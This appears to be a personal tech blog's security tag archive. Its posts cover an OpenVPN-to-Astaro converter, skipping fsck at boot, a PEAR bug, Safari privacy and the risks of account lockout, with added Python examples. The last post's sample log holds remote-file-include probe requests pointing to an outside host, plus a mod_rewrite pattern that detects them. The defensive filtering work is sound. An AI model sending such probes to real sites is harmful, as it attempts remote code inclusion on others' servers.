Tag Archives: security

Astaro ASG as OpenVPN Access Server client

Just about four weeks ago I posted about the resurrection of the .ovpn to .apc converter script. In the meantime Alois told me in the comments that, while this was nice, it didn’t work for current versions of the OpenVPN Access Server and the .ovpn files it creates.

Well, since there’s been nothing much else to do, I did some more work on the script and I can now happily say that it also converts the new .ovpn format to an .apc the Astaro can understand. Unfortunately, there’s a little catch: the OpenVPN Access Server relies on ‘tls-auth’ for client connections, and the Astaro neither knows of that concept nor provides a method to import the needed key file. So I had to do some creative manipulation to make the Astaro include the necessary config statements. In addition, you will need to manually copy the key file to the Astaro to make everything work as expected. Keep in mind that the tls-auth key is a shared secret: copy it over a secure channel (scp, not a plain web form or mail) and keep it readable by root only. To make things as easy as possible, the script will tell you what to do.

If you’re interested, check out the latest version of ovpn-to-apc.sh on Gitorious. If it works for you, let me know. If it doesn’t, let me know, too.

.ovpn to .apc Converter Revisited

The Astaro Security Gateway (ASG) is a great firewall and remote access solution. Its one flaw is that Astaro, too, tries to build a walled garden around their suite of products. One major drawback here is that while the ASG has outstanding capabilities as a remote access server, there’s no easy way to use it as a client to connect to an OpenVPN SSL server. The main show stopper is that the ASG expects to get all of its connection information from a .apc file, while OpenVPN at best provides a .ovpn file, which has a completely different structure.
Back in 2009 Patrick Schneider provided a simple bash script that would convert .ovpn files, together with the needed certificates and key files, into a .apc file the ASG could read. Unfortunately the script stopped working with newer ASG releases. Since I needed the functionality for a current project, I resurrected the code and polished and updated it a bit. The result can now be found on Gitorious: the new OVPN-to-APC converter script. Feel free to clone and enhance.

Update: Just pushed a new version to Gitorious that now handles the new .ovpn format provided by the OpenVPN Access Server as well.
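The part of the conversion the two posts above are about is the profile parsing: the newer OpenVPN Access Server profiles carry the CA, the client certificate, the client key and the tls-auth key inline as <tag>...</tag> blocks instead of referencing separate files. The following is an added example, not code from ovpn-to-apc.sh or from Astaro, that pulls those blocks apart and shows which files would have to be copied to the ASG by hand. The sample profile is constructed here, the PEM bodies are placeholders, and the output file names (ca.crt, client.crt, client.key, ta.key) are my own assumption.

```python
import re

# Constructed sample profile in the inline format that OpenVPN Access Server
# hands out. The PEM bodies are placeholders, not real key material.
SAMPLE_OVPN = """\
client
dev tun
proto udp
remote vpn.example.com 1194
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
CA-PLACEHOLDER
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
CERT-PLACEHOLDER
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
KEY-PLACEHOLDER
-----END PRIVATE KEY-----
</key>
<tls-auth>
-----BEGIN OpenVPN Static key V1-----
TA-PLACEHOLDER
-----END OpenVPN Static key V1-----
</tls-auth>
"""

# An inline block starts with <tag> on its own line and ends with the
# matching </tag>; the body in between is the PEM text.
BLOCK_RE = re.compile(r"^<(?P<tag>[a-z-]+)>\n(?P<body>.*?)^</(?P=tag)>\n?",
                      re.S | re.M)


def parse_ovpn(text):
    """Split a profile into plain options and inline blocks.

    Returns (options, blocks): options is a list of (name, args) tuples in
    file order, blocks maps a tag such as 'tls-auth' to its PEM body."""
    blocks = {}

    def grab(match):
        blocks[match.group("tag")] = match.group("body")
        return ""  # drop the block from the option text

    remainder = BLOCK_RE.sub(grab, text)
    options = []
    for line in remainder.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        name, _, rest = line.partition(" ")
        options.append((name, rest.split()))
    return options, blocks


def tls_auth_direction(options):
    """Key direction the client must use: 'key-direction N' for inline keys,
    or the third argument of an explicit 'tls-auth file N'. The later
    statement wins, as in OpenVPN itself. Returns None if unset."""
    direction = None
    for name, args in options:
        if name == "tls-auth" and len(args) >= 2:
            direction = args[1]
        elif name == "key-direction" and args:
            direction = args[0]
    return direction


def files_to_copy(blocks):
    """Map each inline block to the file name it would be written out to
    (assumed names; the converter script may choose others)."""
    names = {"ca": "ca.crt", "cert": "client.crt",
             "key": "client.key", "tls-auth": "ta.key"}
    return {names[tag]: body for tag, body in blocks.items() if tag in names}


if __name__ == "__main__":
    opts, blks = parse_ovpn(SAMPLE_OVPN)
    print("options:", [o[0] for o in opts])
    print("tls-auth direction:", tls_auth_direction(opts))
    print("files to copy:", sorted(files_to_copy(blks)))
```

The tls-auth body is what has to land on the ASG by hand, together with a `tls-auth ta.key <direction>` statement; the direction is almost always 1 for clients, but reading it from the profile rather than hard-coding it avoids a silently failing handshake when a server was set up the other way round.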


Earlier a customer called, asking whether I know the password.
I basically never remember passwords.
But weltfrieden (“world peace”) I could indeed remember.

Would probably have gone the same way for me.

It comes by night and sucks the essence from your computers

Today, after some intensive initial beta testing by Jan-Piet, I decided to release Bacula 3.0.2 for ReadyNAS NV/NV+/Duo/1100/X6.

For those of you who don’t know Bacula and what it does: The headline says it all. Or to quote the website:

Bacula is a set of Open Source, enterprise ready, computer programs that permit you to manage backup, recovery, and verification of computer data across a network of computers of different kinds. In technical terms, it is an Open Source, enterprise ready, network based backup program.

That said, you should know that it’s not a snap to configure, so be sure to read the documentation or at least have a look at the quick walk-through provided by Jan-Piet.


Bypass fsck on Linux startup

While re-installing the server hosting this site yesterday I ran into an interesting problem: The initial run of

fsck

on booting up the Linux image provided by my hoster would report a file system inconsistency and wait for either the “root” password or a press of CTRL-D.
Since I didn’t know the “root” password (this is only supplied after installation has finished) and CTRL-D resulted in a reboot with the same result as before, I was stuck in a catch-22. Or so it seemed.


Luckily I had access to a serial console, so I could interrupt the boot process and edit the GRUB line with the kernel options. Adding the statement

fastboot

there made the boot scripts skip the initial fsck run (on CentOS 5 it is rc.sysinit, not the kernel itself, that looks for fastboot on the command line) and voilà, the installation completed successfully. Note that this only skips the check, it doesn’t repair anything: once you have the root password, run fsck on the unmounted (or read-only) file system before trusting the box with real data.

To give you the whole picture: All I had to do was to change this

title CentOS 5
    root (hd0,0)
    kernel /vmlinuz ro root=LABEL=/ console=tty0 console=ttyS0,57600
    initrd /initrd

to that

title CentOS 5
    root (hd0,0)
    kernel /vmlinuz ro root=LABEL=/ console=tty0 console=ttyS0,57600 fastboot
    initrd /initrd

PEAR broken in PHP 5.2.10

While trying to upgrade a customer’s installation to PHP 5.2.10 I learned the hard way that PEAR is broken in this release. This isn’t specific to any OS, as the bug reports show, but rather seems to be a general problem that slipped through QA (who is laughing there?). All you’ll get is

"Cannot use a scalar value as an array in
phar://install-pear-nozlib.phar/PEAR/ChannelFile.php on line 1391"

when trying to install PEAR.
So, for the time being, better not upgrade to PHP 5.2.10 if you need to use PEAR.


Safari 4 Privacy Issues

As C. Harwick found out, Safari 4 leaves a messy trail of what it did. Or, to be more precise, of what you did while using Safari 4.

Those of you who’ve been trying out the new Safari 4 beta – at least on the Mac, though I imagine you could find similar data trails on the Windows version too – have no doubt been impressed at its shiny new features. But if you’re a stickler for disk space like I am, or a stickler for privacy (or, heaven help you, both), Safari’s poor housekeeping is quite alarming.



Astaro PostgreSQL Fix

For some months now my Astaro firewall was unable to start the PostgreSQL service on boot. Since this didn’t seem to have any real impact on function or performance, I started some feeble attempts at fixing it but never succeeded until today.


Security: Why locking out users is a really bad idea

In his article over at NetworkWorld, Mich Kabay gives a nice example of how the theory of security in networked systems tends to clash with reality:

“Locking out an account after only a few failed attempts has a significant impact on legitimate users and tends to cause them to choose simpler passwords or store their passwords insecurely, thus weakening security.”

More on why you just shouldn’t lock out users can be found in the full article, “Locking out users gives attackers a tool for denial of service”: anyone who knows a user name can lock that user out on purpose, so the lockout rule becomes a denial-of-service lever rather than a protection.
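To make the article’s point concrete, here is an added illustration of my own, not code from Kabay or NetworkWorld: the same three bad guesses from an attacker are fed to a hard account lockout and to a throttle keyed on the (account, source) pair, and then the real user tries to log in. The user names, addresses and thresholds are made up for the example.

```python
from collections import defaultdict


class HardLockout:
    """Lock the account after `threshold` failures, whoever caused them."""

    def __init__(self, threshold=3):
        self.threshold = threshold
        self.failures = defaultdict(int)
        self.locked = set()

    def attempt(self, user, source, password_ok):
        if user in self.locked:
            return "locked"
        if password_ok:
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return "denied"


class SourceThrottle:
    """Slow down the (account, source) pair that is failing; the account
    itself never locks, so a legitimate user elsewhere is unaffected."""

    def __init__(self, base_delay=1, max_delay=3600):
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.failures = defaultdict(int)

    def attempt(self, user, source, password_ok):
        key = (user, source)
        if password_ok:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        # exponential backoff: 1s, 2s, 4s, ... capped at max_delay, so a
        # brute force from one source grinds to a halt while other sources
        # see no delay at all
        delay = min(self.base_delay * 2 ** (self.failures[key] - 1),
                    self.max_delay)
        return f"denied, wait {delay}s"


# Constructed scenario: the attacker only knows the user name (documentation
# addresses, made up for the example).
VICTIM = "alice"
ATTACKER_IP = "203.0.113.9"
VICTIM_IP = "198.51.100.4"


def simulate(policy):
    """Three wrong guesses from the attacker, then the real user logs in
    with the correct password from her own machine. Returns what she sees."""
    for guess in ("123456", "password", "alice1"):
        policy.attempt(VICTIM, ATTACKER_IP, password_ok=False)
    return policy.attempt(VICTIM, VICTIM_IP, password_ok=True)


if __name__ == "__main__":
    print("hard lockout:", simulate(HardLockout()))      # locked
    print("source throttle:", simulate(SourceThrottle()))  # ok
```

The throttle is not a silver bullet either: attackers spread over many sources, or legitimate users behind one NAT, blur the per-source key, which is why most real deployments combine a per-source delay with monitoring rather than with a hard lock on the account.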


Just in case

If you’re seeing a lot of requests like these in your logs


this might come in handy:

# Send unwanted query strings elsewhere
RewriteCond   %{QUERY_STRING} http:\/\/.*\?\?
RewriteRule   ^.*$   http://www.turnofftheinternet.com/?     [L]

Add, adapt and change to your needs ;)

Two things to keep in mind: the rules need RewriteEngine On somewhere above them, and because the target is an absolute URL, mod_rewrite turns the [L] rule into an external (302) redirect, which means you are bouncing the scanner’s traffic onto somebody else’s site. If you’d rather not do that, RewriteRule ^.*$ - [F,L] simply answers 403 instead.
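Before putting a RewriteCond like that live it is worth checking what it actually catches. The following is an added example of mine, not part of the original post, that applies the same pattern to the query string of constructed log lines (the addresses and paths are made up, the request shape is the usual remote-file-include probe with a trailing “??”) and reports which requests the rule would redirect.

```python
import re
from urllib.parse import urlsplit

# The RewriteCond pattern from the post, as a Python regex: a literal
# "http://" somewhere in the query string followed later by two literal
# question marks.
UNWANTED_QS = re.compile(r"http://.*\?\?")

# Constructed request lines in Apache common-log format, not taken from any
# real server. The first two have the probe shape the rule targets; the
# last two are legitimate, and the fourth contains "http://" but no "??".
SAMPLE_LOG = """\
203.0.113.9 - - [12/Jun/2009:03:14:07 +0200] "GET /index.php?page=http://203.0.113.77/id.txt?? HTTP/1.1" 200 1234
203.0.113.9 - - [12/Jun/2009:03:14:08 +0200] "GET /wp-content/plugins/x/y.php?_SERVER[DOCUMENT_ROOT]=http://203.0.113.77/id.txt?? HTTP/1.1" 404 512
198.51.100.4 - - [12/Jun/2009:08:00:01 +0200] "GET /?s=openvpn HTTP/1.1" 200 8000
198.51.100.4 - - [12/Jun/2009:08:00:02 +0200] "GET /2009/06/?ref=http://example.org/ HTTP/1.1" 200 8000
"""

# Pull the request target out of the quoted "METHOD target HTTP/x.y" field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def query_string(target):
    """The part after the first '?', which is what %{QUERY_STRING} sees."""
    return urlsplit(target).query


def would_redirect(target):
    """True if the RewriteCond would match this request target."""
    return UNWANTED_QS.search(query_string(target)) is not None


def flag_requests(log_text):
    """Return the request targets in the log that the rule would redirect."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and would_redirect(match.group("target")):
            hits.append(match.group("target"))
    return hits


if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("would redirect:", target)
```

Running it over your own access log (read the file instead of SAMPLE_LOG) before enabling the rule shows whether any legitimate referrer-style parameters get caught; the fourth sample line is there to show that a plain “http://” in the query string alone is not enough to trigger it.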